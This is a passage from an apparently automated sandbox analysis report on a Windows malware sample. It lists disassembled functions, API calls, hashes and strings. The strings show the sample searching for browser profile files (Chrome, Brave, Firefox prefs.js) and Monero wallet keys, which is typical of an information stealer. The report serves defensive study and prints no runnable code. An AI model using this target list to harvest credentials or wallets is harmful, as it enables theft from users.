                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 4b94805d86cff52192656a45e7ff63e1ccd9718ad6c946e632195e0778db2198
                              • Instruction ID: 12b0e3cd8ea89c974b2ffab7867a32bd1fe5295348c94f25174221410410a547
                              • Opcode Fuzzy Hash: 4b94805d86cff52192656a45e7ff63e1ccd9718ad6c946e632195e0778db2198
                              • Instruction Fuzzy Hash: BCF0E271641208BBE7189AA8AC49FAAB7ECE706B15F300448F904E7280D971AE40DBA4
                              Function 00641190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 006578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00657910
                                • Part of subcall function 006578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00657917
                                • Part of subcall function 006578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0065792F
                                • Part of subcall function 00657850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006411B7), ref: 00657880
                                • Part of subcall function 00657850: RtlAllocateHeap.NTDLL(00000000), ref: 00657887
                                • Part of subcall function 00657850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0065789F
                              • ExitProcess.KERNEL32 ref: 006411C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: 6f1a10434e74d9242efc53d526a7b28901e7dfb297dedc44fd6158895ffa4fcb
                              • Instruction ID: d15f54029ef06b6d05583548ae76224e6a7ecc3a6faecc0ea4fac61c3f698a50
                              • Opcode Fuzzy Hash: 6f1a10434e74d9242efc53d526a7b28901e7dfb297dedc44fd6158895ffa4fcb
                              • Instruction Fuzzy Hash: 2FE012B591430557DF4473F4BC0AB2A329E6B15747F04043DFE05D7642FE29E844866E

                              Non-executed Functions

                              Function 006538B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 006538CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 006538E3
                              • lstrcat.KERNEL32(?,?), ref: 00653935
                              • StrCmpCA.SHLWAPI(?,00660F70), ref: 00653947
                              • StrCmpCA.SHLWAPI(?,00660F74), ref: 0065395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00653C67
                              • FindClose.KERNEL32(000000FF), ref: 00653C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 6f63a519c4b4ac1050246ba54f5a12e648e8452436b1c537c9d96feab9163056
                              • Instruction ID: ae4f4d8883a04bd5c87f6907f0476a8ec555aa3e637901169b67ba6981d18b27
                              • Opcode Fuzzy Hash: 6f63a519c4b4ac1050246ba54f5a12e648e8452436b1c537c9d96feab9163056
                              • Instruction Fuzzy Hash: 92A162B1900218ABDB24DFA4DC85FEE7379BF48701F04459DB90D96281EB749B88CF62
                              Function 0064BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                              • FindFirstFileA.KERNEL32(00000000,?,00660B32,00660B2B,00000000,?,?,?,006613F4,00660B2A), ref: 0064BEF5
                              • StrCmpCA.SHLWAPI(?,006613F8), ref: 0064BF4D
                              • StrCmpCA.SHLWAPI(?,006613FC), ref: 0064BF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0064C7BF
                              • FindClose.KERNEL32(000000FF), ref: 0064C7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 597d1eb37f7d395b35c7e1554a643d7b6621cc2ed9a4cd368097e68ff1cb965f
                              • Instruction ID: 13b76fa283355b678b8446f775375365b08cd00d8aa2db87e914b6471313607d
                              • Opcode Fuzzy Hash: 597d1eb37f7d395b35c7e1554a643d7b6621cc2ed9a4cd368097e68ff1cb965f
                              • Instruction Fuzzy Hash: 804265729101089BDB54FBB0DD56EED737EAF84301F40466CBD0AA6181EE349B4DCBA6
                              Function 00654910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 0065492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00654943
                              • StrCmpCA.SHLWAPI(?,00660FDC), ref: 00654971
                              • StrCmpCA.SHLWAPI(?,00660FE0), ref: 00654987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00654B7D
                              • FindClose.KERNEL32(000000FF), ref: 00654B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 825eac5c2958553642429b936f0b89e64b89ba1b8510a0acf6eba8cc6cf948dc
                              • Instruction ID: f678626610896f0c5da7bb526f98080bdebd0a76837a0d39e29f16ed8276cf2c
                              • Opcode Fuzzy Hash: 825eac5c2958553642429b936f0b89e64b89ba1b8510a0acf6eba8cc6cf948dc
                              • Instruction Fuzzy Hash: 906187B1500208ABDB24EBA4DC45FEA737DBB48301F04459DF90996180EF75DB89CFA1
                              Function 00654570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00654580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00654587
                              • wsprintfA.USER32 ref: 006545A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 006545BD
                              • StrCmpCA.SHLWAPI(?,00660FC4), ref: 006545EB
                              • StrCmpCA.SHLWAPI(?,00660FC8), ref: 00654601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0065468B
                              • FindClose.KERNEL32(000000FF), ref: 006546A0
                              • lstrcat.KERNEL32(?,013DECA0), ref: 006546C5
                              • lstrcat.KERNEL32(?,013DDE58), ref: 006546D8
                              • lstrlen.KERNEL32(?), ref: 006546E5
                              • lstrlen.KERNEL32(?), ref: 006546F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: cfd81f51c716388c4d52d7e1f1dd36d6dc463b9d012dbad15f8f894392592025
                              • Instruction ID: 93e85c309e2d6f9c156b4ac604160c7758f9b7194f6efd43c0ba901258b72668
                              • Opcode Fuzzy Hash: cfd81f51c716388c4d52d7e1f1dd36d6dc463b9d012dbad15f8f894392592025
                              • Instruction Fuzzy Hash: DA5196B15002189FD764EB74DC89FEE737DBB58301F004599FA4996180EF749B888FA2
                              Function 00653EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00653EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 00653EDA
                              • StrCmpCA.SHLWAPI(?,00660FAC), ref: 00653F08
                              • StrCmpCA.SHLWAPI(?,00660FB0), ref: 00653F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0065406C
                              • FindClose.KERNEL32(000000FF), ref: 00654081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: a7b8eebadabfd1f63866145bb27de6666822d52861c2b2d9efa8881d74c4c159
                              • Instruction ID: d790c7d2ef35427a4d6e49f9ab03f48ca39b6c693eb462782f69b6a1f1791b1c
                              • Opcode Fuzzy Hash: a7b8eebadabfd1f63866145bb27de6666822d52861c2b2d9efa8881d74c4c159
                              • Instruction Fuzzy Hash: 4A51D9B2900218ABDB24FBB4DC85EEA737DBB44301F00459DB65992180EB75DB89CF65
                              Function 0064ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 0064ED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 0064ED55
                              • StrCmpCA.SHLWAPI(?,00661538), ref: 0064EDAB
                              • StrCmpCA.SHLWAPI(?,0066153C), ref: 0064EDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0064F2AE
                              • FindClose.KERNEL32(000000FF), ref: 0064F2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: 3f0e094551fe95f08caeb6939bdefcba6d917ec908213cc396e678abd2f0af0c
                              • Instruction ID: 06138ea04359b5ca6910e40176944f24f94803d9ec8d533fefe07c3e6fe7cb6b
                              • Opcode Fuzzy Hash: 3f0e094551fe95f08caeb6939bdefcba6d917ec908213cc396e678abd2f0af0c
                              • Instruction Fuzzy Hash: 2EE1B5719111189AEB94FBA0DC52EEE733ABF54301F40469DB90A66092EF306F8ECF55
                              Function 0064F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006615B8,00660D96), ref: 0064F71E
                              • StrCmpCA.SHLWAPI(?,006615BC), ref: 0064F76F
                              • StrCmpCA.SHLWAPI(?,006615C0), ref: 0064F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0064FAB1
                              • FindClose.KERNEL32(000000FF), ref: 0064FAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: b162701252aa71b8ae02dcd6a000b0e62bb9acfde8145e7ba6cb096211d0dd2d
                              • Instruction ID: fb95e82e4c5e1773d1f662854ee79e6b2bc46b07241500fe682cb7f709519217
                              • Opcode Fuzzy Hash: b162701252aa71b8ae02dcd6a000b0e62bb9acfde8145e7ba6cb096211d0dd2d
                              • Instruction Fuzzy Hash: 1FB155719001189BDB64FFA4DC55AEE737ABF54301F4086ACE80A9B181EF306B4DCB96
                              Function 006416D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0066510C,?,?,?,006651B4,?,?,00000000,?,00000000), ref: 00641923
                              • StrCmpCA.SHLWAPI(?,0066525C), ref: 00641973
                              • StrCmpCA.SHLWAPI(?,00665304), ref: 00641989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00641D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00641DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00641E20
                              • FindClose.KERNEL32(000000FF), ref: 00641E32
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
